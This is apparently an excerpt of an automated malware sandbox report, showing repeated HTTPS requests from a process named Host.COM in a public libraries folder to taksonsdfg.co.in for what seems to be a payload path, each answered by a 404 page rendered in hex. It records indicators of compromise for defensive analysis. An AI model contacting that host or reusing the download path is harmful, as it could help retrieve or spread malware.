                                                                                    Data Ascii: -top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    42192.168.2.449842108.170.55.2024437652C:\Users\Public\Libraries\Host.COM
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-10-14 02:30:06 UTC178OUTGET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1
                                                                                    Connection: Keep-Alive
                                                                                    Accept: */*
                                                                                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                                                    Host: taksonsdfg.co.in
                                                                                    2024-10-14 02:30:07 UTC416INHTTP/1.1 404 Not Found
                                                                                    Connection: close
                                                                                    cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                    pragma: no-cache
                                                                                    content-type: text/html
                                                                                    content-length: 1251
                                                                                    date: Mon, 14 Oct 2024 02:30:06 GMT
                                                                                    server: LiteSpeed
                                                                                    alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                                                                                    2024-10-14 02:30:07 UTC952INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79
                                                                                    Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</sty
                                                                                    2024-10-14 02:30:07 UTC299INData Raw: 2d 74 6f 70 3a 20 31 70 78 20 73 6f 6c 69 64 20 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 31 35 29 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 31 70 78 20 30 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 30 2e 33 29 20 69 6e 73 65 74 3b 22 3e 0a 3c 62 72 3e 50 72 6f 75 64 6c 79 20 70 6f 77 65 72 65 64 20 62 79 20 4c 69 74 65 53 70 65 65 64 20 57 65 62 20 53 65 72 76 65 72 3c 70 3e 50 6c 65 61 73 65 20 62 65 20 61 64 76 69 73 65 64 20 74 68 61 74 20 4c 69 74 65 53 70 65 65 64 20 54 65 63 68 6e 6f 6c 6f 67 69 65 73 20 49 6e 63 2e 20 69 73 20 6e 6f 74 20 61 20 77 65 62 20 68 6f 73 74 69 6e 67 20 63 6f 6d 70 61 6e 79 20 61 6e 64 2c 20 61 73 20 73 75 63 68 2c 20 68 61 73 20 6e 6f 20 63 6f 6e 74 72 6f 6c 20 6f 76 65 72 20 63 6f 6e 74 65 6e 74 20
                                                                                    Data Ascii: -top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    43192.168.2.449848108.170.55.2024437652C:\Users\Public\Libraries\Host.COM
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-10-14 02:30:07 UTC178OUTGET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1
                                                                                    Connection: Keep-Alive
                                                                                    Accept: */*
                                                                                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                                                    Host: taksonsdfg.co.in
                                                                                    2024-10-14 02:30:08 UTC416INHTTP/1.1 404 Not Found
                                                                                    Connection: close
                                                                                    cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                    pragma: no-cache
                                                                                    content-type: text/html
                                                                                    content-length: 1251
                                                                                    date: Mon, 14 Oct 2024 02:30:08 GMT
                                                                                    server: LiteSpeed
                                                                                    alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                                                                                    2024-10-14 02:30:08 UTC952INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79
                                                                                    Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</sty
                                                                                    2024-10-14 02:30:08 UTC299INData Raw: 2d 74 6f 70 3a 20 31 70 78 20 73 6f 6c 69 64 20 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 31 35 29 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 31 70 78 20 30 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 30 2e 33 29 20 69 6e 73 65 74 3b 22 3e 0a 3c 62 72 3e 50 72 6f 75 64 6c 79 20 70 6f 77 65 72 65 64 20 62 79 20 4c 69 74 65 53 70 65 65 64 20 57 65 62 20 53 65 72 76 65 72 3c 70 3e 50 6c 65 61 73 65 20 62 65 20 61 64 76 69 73 65 64 20 74 68 61 74 20 4c 69 74 65 53 70 65 65 64 20 54 65 63 68 6e 6f 6c 6f 67 69 65 73 20 49 6e 63 2e 20 69 73 20 6e 6f 74 20 61 20 77 65 62 20 68 6f 73 74 69 6e 67 20 63 6f 6d 70 61 6e 79 20 61 6e 64 2c 20 61 73 20 73 75 63 68 2c 20 68 61 73 20 6e 6f 20 63 6f 6e 74 72 6f 6c 20 6f 76 65 72 20 63 6f 6e 74 65 6e 74 20
                                                                                    Data Ascii: -top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    44192.168.2.449858108.170.55.2024437652C:\Users\Public\Libraries\Host.COM
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-10-14 02:30:09 UTC178OUTGET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1
                                                                                    Connection: Keep-Alive
                                                                                    Accept: */*
                                                                                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                                                    Host: taksonsdfg.co.in
                                                                                    2024-10-14 02:30:09 UTC416INHTTP/1.1 404 Not Found
                                                                                    Connection: close
                                                                                    cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                    pragma: no-cache
                                                                                    content-type: text/html
                                                                                    content-length: 1251
                                                                                    date: Mon, 14 Oct 2024 02:30:09 GMT
                                                                                    server: LiteSpeed
                                                                                    alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                                                                                    2024-10-14 02:30:09 UTC952INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79
                                                                                    Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</sty
                                                                                    2024-10-14 02:30:09 UTC299INData Raw: 2d 74 6f 70 3a 20 31 70 78 20 73 6f 6c 69 64 20 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 31 35 29 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 31 70 78 20 30 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 30 2e 33 29 20 69 6e 73 65 74 3b 22 3e 0a 3c 62 72 3e 50 72 6f 75 64 6c 79 20 70 6f 77 65 72 65 64 20 62 79 20 4c 69 74 65 53 70 65 65 64 20 57 65 62 20 53 65 72 76 65 72 3c 70 3e 50 6c 65 61 73 65 20 62 65 20 61 64 76 69 73 65 64 20 74 68 61 74 20 4c 69 74 65 53 70 65 65 64 20 54 65 63 68 6e 6f 6c 6f 67 69 65 73 20 49 6e 63 2e 20 69 73 20 6e 6f 74 20 61 20 77 65 62 20 68 6f 73 74 69 6e 67 20 63 6f 6d 70 61 6e 79 20 61 6e 64 2c 20 61 73 20 73 75 63 68 2c 20 68 61 73 20 6e 6f 20 63 6f 6e 74 72 6f 6c 20 6f 76 65 72 20 63 6f 6e 74 65 6e 74 20
                                                                                    Data Ascii: -top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    45192.168.2.449865108.170.55.2024437652C:\Users\Public\Libraries\Host.COM
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-10-14 02:30:10 UTC178OUTGET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1
                                                                                    Connection: Keep-Alive
                                                                                    Accept: */*
                                                                                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                                                    Host: taksonsdfg.co.in
                                                                                    2024-10-14 02:30:11 UTC416INHTTP/1.1 404 Not Found
                                                                                    Connection: close
                                                                                    cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                    pragma: no-cache
                                                                                    content-type: text/html
                                                                                    content-length: 1251
                                                                                    date: Mon, 14 Oct 2024 02:30:11 GMT
                                                                                    server: LiteSpeed
                                                                                    alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                                                                                    2024-10-14 02:30:11 UTC952INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79
                                                                                    Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</sty
                                                                                    2024-10-14 02:30:11 UTC299INData Raw: 2d 74 6f 70 3a 20 31 70 78 20 73 6f 6c 69 64 20 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 31 35 29 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 31 70 78 20 30 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 30 2e 33 29 20 69 6e 73 65 74 3b 22 3e 0a 3c 62 72 3e 50 72 6f 75 64 6c 79 20 70 6f 77 65 72 65 64 20 62 79 20 4c 69 74 65 53 70 65 65 64 20 57 65 62 20 53 65 72 76 65 72 3c 70 3e 50 6c 65 61 73 65 20 62 65 20 61 64 76 69 73 65 64 20 74 68 61 74 20 4c 69 74 65 53 70 65 65 64 20 54 65 63 68 6e 6f 6c 6f 67 69 65 73 20 49 6e 63 2e 20 69 73 20 6e 6f 74 20 61 20 77 65 62 20 68 6f 73 74 69 6e 67 20 63 6f 6d 70 61 6e 79 20 61 6e 64 2c 20 61 73 20 73 75 63 68 2c 20 68 61 73 20 6e 6f 20 63 6f 6e 74 72 6f 6c 20 6f 76 65 72 20 63 6f 6e 74 65 6e 74 20
                                                                                    Data Ascii: -top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    46192.168.2.449877108.170.55.2024437652C:\Users\Public\Libraries\Host.COM
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-10-14 02:30:12 UTC178OUTGET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1
                                                                                    Connection: Keep-Alive
                                                                                    Accept: */*
                                                                                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                                                    Host: taksonsdfg.co.in
                                                                                    2024-10-14 02:30:12 UTC416INHTTP/1.1 404 Not Found
                                                                                    Connection: close
                                                                                    cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                    pragma: no-cache
                                                                                    content-type: text/html
                                                                                    content-length: 1251
                                                                                    date: Mon, 14 Oct 2024 02:30:12 GMT
                                                                                    server: LiteSpeed
                                                                                    alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                                                                                    2024-10-14 02:30:12 UTC952INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79
                                                                                    Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</sty
                                                                                    2024-10-14 02:30:12 UTC299INData Raw: 2d 74 6f 70 3a 20 31 70 78 20 73 6f 6c 69 64 20 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 31 35 29 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 31 70 78 20 30 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 30 2e 33 29 20 69 6e 73 65 74 3b 22 3e 0a 3c 62 72 3e 50 72 6f 75 64 6c 79 20 70 6f 77 65 72 65 64 20 62 79 20 4c 69 74 65 53 70 65 65 64 20 57 65 62 20 53 65 72 76 65 72 3c 70 3e 50 6c 65 61 73 65 20 62 65 20 61 64 76 69 73 65 64 20 74 68 61 74 20 4c 69 74 65 53 70 65 65 64 20 54 65 63 68 6e 6f 6c 6f 67 69 65 73 20 49 6e 63 2e 20 69 73 20 6e 6f 74 20 61 20 77 65 62 20 68 6f 73 74 69 6e 67 20 63 6f 6d 70 61 6e 79 20 61 6e 64 2c 20 61 73 20 73 75 63 68 2c 20 68 61 73 20 6e 6f 20 63 6f 6e 74 72 6f 6c 20 6f 76 65 72 20 63 6f 6e 74 65 6e 74 20
                                                                                    Data Ascii: -top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    47192.168.2.449884108.170.55.2024437652C:\Users\Public\Libraries\Host.COM
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-10-14 02:30:13 UTC178OUTGET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1
                                                                                    Connection: Keep-Alive
                                                                                    Accept: */*
                                                                                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                                                    Host: taksonsdfg.co.in
                                                                                    2024-10-14 02:30:13 UTC416INHTTP/1.1 404 Not Found
                                                                                    Connection: close
                                                                                    cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                    pragma: no-cache
                                                                                    content-type: text/html
                                                                                    content-length: 1251
                                                                                    date: Mon, 14 Oct 2024 02:30:13 GMT
                                                                                    server: LiteSpeed
                                                                                    alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                                                                                    2024-10-14 02:30:13 UTC952INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79
                                                                                    Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</sty
                                                                                    2024-10-14 02:30:13 UTC299INData Raw: 2d 74 6f 70 3a 20 31 70 78 20 73 6f 6c 69 64 20 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 31 35 29 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 31 70 78 20 30 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 30 2e 33 29 20 69 6e 73 65 74 3b 22 3e 0a 3c 62 72 3e 50 72 6f 75 64 6c 79 20 70 6f 77 65 72 65 64 20 62 79 20 4c 69 74 65 53 70 65 65 64 20 57 65 62 20 53 65 72 76 65 72 3c 70 3e 50 6c 65 61 73 65 20 62 65 20 61 64 76 69 73 65 64 20 74 68 61 74 20 4c 69 74 65 53 70 65 65 64 20 54 65 63 68 6e 6f 6c 6f 67 69 65 73 20 49 6e 63 2e 20 69 73 20 6e 6f 74 20 61 20 77 65 62 20 68 6f 73 74 69 6e 67 20 63 6f 6d 70 61 6e 79 20 61 6e 64 2c 20 61 73 20 73 75 63 68 2c 20 68 61 73 20 6e 6f 20 63 6f 6e 74 72 6f 6c 20 6f 76 65 72 20 63 6f 6e 74 65 6e 74 20
                                                                                    Data Ascii: -top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    48192.168.2.449891108.170.55.2024437652C:\Users\Public\Libraries\Host.COM
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-10-14 02:30:14 UTC178OUTGET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1
                                                                                    Connection: Keep-Alive
                                                                                    Accept: */*
                                                                                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                                                    Host: taksonsdfg.co.in
                                                                                    2024-10-14 02:30:14 UTC416INHTTP/1.1 404 Not Found
                                                                                    Connection: close
                                                                                    cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                    pragma: no-cache
                                                                                    content-type: text/html
                                                                                    content-length: 1251
                                                                                    date: Mon, 14 Oct 2024 02:30:14 GMT
                                                                                    server: LiteSpeed
                                                                                    alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                                                                                    2024-10-14 02:30:14 UTC952INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79
                                                                                    Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</sty
                                                                                    2024-10-14 02:30:14 UTC299INData Raw: 2d 74 6f 70 3a 20 31 70 78 20 73 6f 6c 69 64 20 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 31 35 29 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 31 70 78 20 30 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 30 2e 33 29 20 69 6e 73 65 74 3b 22 3e 0a 3c 62 72 3e 50 72 6f 75 64 6c 79 20 70 6f 77 65 72 65 64 20 62 79 20 4c 69 74 65 53 70 65 65 64 20 57 65 62 20 53 65 72 76 65 72 3c 70 3e 50 6c 65 61 73 65 20 62 65 20 61 64 76 69 73 65 64 20 74 68 61 74 20 4c 69 74 65 53 70 65 65 64 20 54 65 63 68 6e 6f 6c 6f 67 69 65 73 20 49 6e 63 2e 20 69 73 20 6e 6f 74 20 61 20 77 65 62 20 68 6f 73 74 69 6e 67 20 63 6f 6d 70 61 6e 79 20 61 6e 64 2c 20 61 73 20 73 75 63 68 2c 20 68 61 73 20 6e 6f 20 63 6f 6e 74 72 6f 6c 20 6f 76 65 72 20 63 6f 6e 74 65 6e 74 20
                                                                                    Data Ascii: -top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    49192.168.2.449903108.170.55.2024437652C:\Users\Public\Libraries\Host.COM
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-10-14 02:30:15 UTC178OUTGET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1
                                                                                    Connection: Keep-Alive
                                                                                    Accept: */*
                                                                                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                                                    Host: taksonsdfg.co.in
                                                                                    2024-10-14 02:30:15 UTC416INHTTP/1.1 404 Not Found
                                                                                    Connection: close
                                                                                    cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                    pragma: no-cache
                                                                                    content-type: text/html
                                                                                    content-length: 1251
                                                                                    date: Mon, 14 Oct 2024 02:30:15 GMT
                                                                                    server: LiteSpeed
                                                                                    alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
